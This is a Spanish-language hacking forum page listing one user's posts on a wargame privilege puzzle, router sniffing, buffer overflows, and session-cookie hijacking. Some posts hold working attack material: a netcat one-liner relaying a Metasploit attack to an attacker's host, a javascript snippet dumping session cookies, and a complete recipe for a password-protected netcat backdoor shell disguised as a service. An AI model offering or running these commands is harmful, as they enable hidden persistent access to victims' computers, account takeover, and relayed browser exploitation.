elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Temas
Páginas: [1] 2
1  Seguridad Informática / Desafíos - Wargames / permisos archivo passwd en: 21 Marzo 2011, 06:50 am
hola,

resulta que estoy tratando de jugar al wargame de roothack.org (shell) y estoy en el nivel 2,

yo soy el usuario level1
bueno la cosa es que hay un archivo passwd.txt que pertenece al usuario level2 (al que yo tengo que llegar) y obviamente no puedo leerlo...

y tambien en la carpeta home de level 2 hay una carpeta con dos binarios

uno es ./bash y el otro es ./sh , y al ejecutarlos funcionan igual que /bin/bash y /bin/sh y estos dos archivos pertenecen a root.

como hago para leer el contenido de passwd.txt??

Código:
[level1@erinys home]$ ls -la -R level2
level2:
total 24
drwxr-xr-x  5 root   root   4096 Aug 31  2010 .
drwxr-xr-x 11 root   root   4096 Mar 24  2009 ..
lrwxrwxrwx  1 root   root     12 Mar 24  2009 .bash_history -> /dev/urandom
drwxr-xr-x  2 root   root   4096 Aug 31  2010 bin
drwxr-xr-x  2 root   root   4096 Mar 24  2009 password
-rw-r--r--  1 level2 level2   44 Aug 31  2010 .profile
drwx------  2 level2 level2 4096 Aug 22  2007 .ssh

level2/bin:
total 4072
drwxr-xr-x 2 root root    4096 Aug 31  2010 .
drwxr-xr-x 5 root root    4096 Aug 31  2010 ..
-rwxr-xr-x 1 root root 2080033 Aug 31  2010 bash
-rwxr-xr-x 1 root root 2080033 Aug 31  2010 sh

level2/password:
total 12
drwxr-xr-x 2 root   root   4096 Mar 24  2009 .
drwxr-xr-x 5 root   root   4096 Aug 31  2010 ..
-rw-r----- 1 level2 level2   68 Aug 25  2007 passwd.txt
ls: cannot open directory level2/.ssh: Permission denied


ya intente haciendo

./bash -c "cat passwd.txt"

pero lo que mas me extraña de esto es que cuando ejecuto por ejemplo

./bash -c "whoami"
level1

que si el archivo ./bash le pertenece a root no deberia ejecutarse con permisos de root??

ayudaa! estoy trabadisimo.
Salu2
2  Seguridad Informática / Hacking / En que tipo de VPN estoy? en: 20 Febrero 2011, 06:42 am
Tal vez es una pregunta tonta pero...

como puedo saber en que tipo de VPN estoy loggeado?? gracias

Salu2
3  Seguridad Informática / Hacking / Servidor y Cliente detras de router/firewall en: 15 Diciembre 2010, 18:42 pm
Hola,

Que pasa si el atacante y la victima estan detras de un router/firewall y no se tiene acceso a ninguno de los dos(routers)?

Hay alguna manera de utilizar MSF a travez de IRC?

Existe algun *MSFProxy*?

Escenario: La computadora del atacante se encuentra detras de un router al cual no se tiene acceso. La computadora objetivo tambien se encuentra detras de un router al cual no se tiene acceso. La computadora objetivo tiene un navegador vulnerable, y corre con un usuario restringido (no administrador).

Seria posible utilizar netcat como proxy para redirigir un ataque de MSF al browser?

Funcionaria si se redirecciona el ataque a travez de una computadora con acceso directo a inet o que esta detras de un router del que se tiene acceso utilizando netcat asi:
Código:
nc -d -L -p 8080 | nc ip.del.atacante.org 8080

Gracias, espero respuestas creativas xD jaja
Salu2
 
4  Seguridad Informática / Hacking / Sniffar desde el router con BusyBox en: 24 Noviembre 2010, 21:40 pm
Hola,

Bueno, digamos que logro obtener acceso a un router con linux embebido (BusyBox) y quiero sniffear datos que van con SSL, como se hace ?, es decir, siempre he sniffeado desde otra computadora, no desde el router, me imagino que en este caso no debo utilizar el arpspoof porque todos los paquetes ya pasan por el router no?

en conclusion: Como se sniffea desde un router?

Salu2
5  Seguridad Informática / Hacking Wireless / antenna/router/tarjeta en: 8 Octubre 2010, 19:39 pm
hola !

hace poco me hice con una antenna KOZUMI http://www.kozumi-usa.com/new/products/WISP/AFO2v3.html que tiene un router y una tarjeta wi-fi integrada...
la duda es si hay alguna forma de usar estas cosas para wi-fi hacking...

segun lo que vi es dificil..


espero sus opinioones ...

Gracias
Salu2
6  Seguridad Informática / Bugs y Exploits / Duda Buffer Overflow en: 15 Abril 2010, 05:32 am
Hola,

resulta que estoy auditando un programa en busqueda de buffer overflows,
este programa se pone a la escucha de comandos en un puerto determinado,
cuando a uno de esos comandos le paso como parametro mas de 2048 bytes el programa se cierra,
pero se cierra sin mostrar esa tipica ventana de enviar error...

en conclusion, el programa es explotable?

por que se cierra sin mostrar la ventana de error?

que se puede hacer para explotar un BoF?

me debo conformar solo con el DoS?

Gracias de antemano,

Salu2
7  Seguridad Informática / Hacking / ok, estoy en el router.. en: 18 Febrero 2010, 05:12 am
Weno, amigos estoy dentro del router... estoy auditando una red completamente desde el exterior, consegui el acceso al router... pero ahora que?? es decir, como seguir, que hacer?? que posibilidades tengo??

me podrian comentar que es lo que podria hacer de aqui en mas ??
que hacen uds una vez consiguen el acceso a un router?? xD

haganme volar la imaginacion xD

Gracias
Salu2
8  Seguridad Informática / Nivel Web / Cookies en: 2 Febrero 2010, 12:05 pm
Resulta que estoy husmeando sobre esto del sidejacking y me paso esto y no c por que...

bueno, resulta que primero hice una prueba, a ver si esto de robar las cookies realmente funcionaba.. entonces, lo primero que hice.. me meti en el foro, e ingrese a mi cuenta, luego en la barra de direcciones pongo

javascript: prompt("",document.cookie);

y efectivamente me salen las cookies de foro.elhacker.net ...
las copio y las pego en un archivo de texto cualquiera. Despues voy al foro, y salgo de mi cuenta.. hasta ahora, perfecto...

luego, con la ayuda de cookie edit (una extension de firefox para manipular cookies) entro a ver las diferencias entre las cookies del archivo de texto (cuando el user esta logged in) y las del navegador (cuando el user esta logged out), y me doy cuenta que hay una variable llamada elhackernet, que es la unica que cambia... entonces creo esta cookie con el cookie edit, pongo guardar y recargo la pagina del foro...

Perfecto! el foro aparecia como si yo hubiera ingresado a mi cuenta!..

despues borro todas las cookies del sitio y lo intento nuevamente...

entro al foro, ingreso a mi cuenta, y coloco javascript: prompt("",document.cookie);
pero esta vez la cookie elhackernet ya no aparecia...

entonces voy al cookie edit para ver si esta cookie existia... si existia...

las preguntas de la cuestion son:

por que si existe una cookie al hacer javascript: prompt("",document.cookie); no me la muestra como la primera vez??

(todo esto lo hice en firefox, lo intente en GChrome y la cookie elhackernet no salio ni la primera vez)

Tienen los navegadores algun sistema de seguridad para las cookies criticas que guardan la sesion??

por qué la primera vez se mostró la cookie elhackernet y despues de haberla "falsificado" ya no se muestra al hacer document.cookie de javascript??

Se hizo un poquito largo pero espero que me hallan entendido, y que puedan aclarar mis dudas...

Grax
Salu2
9  Seguridad Informática / Hacking / Sidejacking en: 2 Febrero 2010, 10:53 am
Pregunta: Cuando uno sniffea una red... aunque una conexion sea https las cookies viajan sin cifrar?

es decir, yo puedo sniffar el trafico para guardarme todas las cookies y asi entrar a una cuenta de Gmail por ejemplo?? utilizando las cookies sniffadas...


Grax
Salu2
10  Seguridad Informática / Hacking / Login en backdoor con Netcat en: 6 Enero 2010, 09:28 am
Supongamos que tenemos una backdoor con netcat a la escucha en algun puerto de alguna computadora en algun lugar... y no queremos que cualquiera de casualidad se conecte a ese puerto y como por arte de magia le caiga del cielo una shell xD es por eso que le vamos a poner una peticion de contraseña antes de que nc nos brinde la shell..

hacemos un...
Código:
nc -d -L -e login.bat -p 777

y en el login.bat
Código:
@echo off
echo Esta es una backdoor privada xD
echo Password:
echo.
set /p pass=
if %pass%==password (cmd) else (exit)

Obviamente no vais a ser tan obvios de decir "hey eso es una backdoor jajaj" pero puedes simular ser un servicio, o hacer un pequeño server con batch o con wscript o con cualquiera que se te ocurra (nombro batch y wscript porque son los que hay en casi todos los PC) puedes usar la funcion GetPassword de wscript en vez del .bat...

La idea era hacernos recordar que el flag -e del nc no solo cirve para ponerle cmd.exe o /bin/bash xD

En fin, esto es algo extremadamente simple (a veces las cosas simples son lo mas apropiado), pero el limite de netcat esta en el limite de tu imaginación xD
Salu2
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines